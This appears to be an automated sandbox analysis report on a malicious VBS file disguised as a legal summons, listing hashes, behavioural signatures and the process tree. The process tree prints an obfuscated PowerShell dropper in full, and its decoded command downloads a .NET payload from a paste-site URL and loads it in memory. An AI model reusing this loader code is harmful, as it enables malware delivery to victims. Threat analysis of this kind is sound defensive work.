Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
-
submitted
10/06/2024, 18:54
General
-
Target
CITACION_DEMANTA#140520240000000000000.vbs
-
Size
1.5MB
-
MD5
3d9ecaf5d65e5755bf5a1386a635ad25
-
SHA1
14443ef006ea79b529d16964645a583621e296bd
-
SHA256
a3968311db5322bd7f18ac4a4a5ef953561ac1719fa036feef4dda7560c3fd1f
-
SHA512
ed699975143d7be2e59776b5abc487fe28b554e5d041b446a7e850d909b64dda22f27333e751ff9c13ec78e1f25c5e317bf7ba2e892a05c34915fde79dba0593
-
SSDEEP
768:z17V9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9L:z1C
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://textbin.net/raw/ezjmofz3s6
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CITACION_DEMANTA#140520240000000000000.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J☼Bp☼GU☼dgBx☼HE☼I☼☼9☼C☼☼Jw☼w☼Cc☼Ow☼k☼Hg☼YgBv☼GM☼bw☼g☼D0☼I☼☼n☼CU☼c☼B6☼EE☼YwBP☼Gc☼SQBu☼E0☼cg☼l☼Cc☼OwBb☼EI☼eQB0☼GU☼WwBd☼F0☼I☼☼k☼Gc☼e☼Bi☼HM☼a☼☼g☼D0☼I☼Bb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QwBv☼G4☼dgBl☼HI☼d☼Bd☼Do☼OgBG☼HI☼bwBt☼EI☼YQBz☼GU☼Ng☼0☼FM☼d☼By☼Gk☼bgBn☼Cg☼I☼☼o☼E4☼ZQB3☼C0☼TwBi☼Go☼ZQBj☼HQ☼I☼BO☼GU☼d☼☼u☼Fc☼ZQBi☼EM☼b☼Bp☼GU☼bgB0☼Ck☼LgBE☼G8☼dwBu☼Gw☼bwBh☼GQ☼UwB0☼HI☼aQBu☼Gc☼K☼☼g☼Cg☼TgBl☼Hc☼LQBP☼GI☼agBl☼GM☼d☼☼g☼E4☼ZQB0☼C4☼VwBl☼GI☼QwBs☼Gk☼ZQBu☼HQ☼KQ☼u☼EQ☼bwB3☼G4☼b☼Bv☼GE☼Z☼BT☼HQ☼cgBp☼G4☼Zw☼o☼Cc☼a☼B0☼HQ☼c☼Bz☼Do☼Lw☼v☼HQ☼ZQB4☼HQ☼YgBp☼G4☼LgBu☼GU☼d☼☼v☼HI☼YQB3☼C8☼ZQB6☼Go☼bQBv☼GY☼eg☼z☼HM☼Ng☼n☼Ck☼I☼☼p☼C☼☼KQ☼7☼Fs☼cwB5☼HM☼d☼Bl☼G0☼LgBB☼H☼☼c☼BE☼G8☼bQBh☼Gk☼bgBd☼Do☼OgBD☼HU☼cgBy☼GU☼bgB0☼EQ☼bwBt☼GE☼aQBu☼C4☼T☼Bv☼GE☼Z☼☼o☼CQ☼ZwB4☼GI☼cwBo☼Ck☼LgBH☼GU☼d☼BU☼Hk☼c☼Bl☼Cg☼JwBN☼GE☼cgBh☼GM☼YQBp☼GI☼bw☼u☼EM☼b☼Bh☼HM☼cw☼x☼Cc☼KQ☼u☼Ec☼ZQB0☼E0☼ZQB0☼Gg☼bwBk☼Cg☼JwBN☼HM☼cQBC☼Ek☼YgBZ☼Cc☼KQ☼u☼Ek☼bgB2☼G8☼awBl☼Cg☼J☼Bu☼HU☼b☼Bs☼Cw☼I☼Bb☼G8☼YgBq☼GU☼YwB0☼Fs☼XQBd☼C☼☼K☼☼n☼D☼☼LwBQ☼Eo☼d☼BJ☼Fk☼LwBy☼C8☼ZQBl☼C4☼ZQB0☼HM☼YQBw☼C8☼Lw☼6☼HM☼c☼B0☼HQ☼a☼☼n☼C☼☼L☼☼g☼CQ☼e☼Bi☼G8☼YwBv☼C☼☼L☼☼g☼Cc☼XwBf☼F8☼XwBo☼HQ☼aQBx☼GI☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼Xw☼t☼C0☼LQ☼t☼C0☼LQ☼t☼Cc☼L☼☼g☼CQ☼aQBl☼HY☼cQBx☼Cw☼I☼☼n☼DE☼Jw☼s☼C☼☼JwBS☼G8☼Z☼Bh☼Cc☼I☼☼p☼Ck☼Ow☼=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('☼','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\CITACION_DEMANTA#140520240000000000000.vbs');powershell -command $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$ievqq = '0';$xboco = 'C:\Users\Admin\AppData\Local\Temp\CITACION_DEMANTA#140520240000000000000.vbs';[Byte[]] $gxbsh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );[system.AppDomain]::CurrentDomain.Load($gxbsh).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/PJtIY/r/ee.etsap//:sptth' , $xboco , '____htiqb________________________________________-------', $ievqq, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD53fb42383cea750b25dcd05daa9ecd845
SHA127aea94d86ff9923cb31591065a758ff1260419a
SHA256133ba8159047f7b7b53a8569128bd2796aba849c12eb1040acf375ba47ecb502
SHA5126b0554f05b4e3d801eee610198e4e910a2aabef59f3e651212c00dd2b3bb51427b24a08030d00fc9e40ae446c9735e739d9d3fd657b911e666628110819c6e93
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB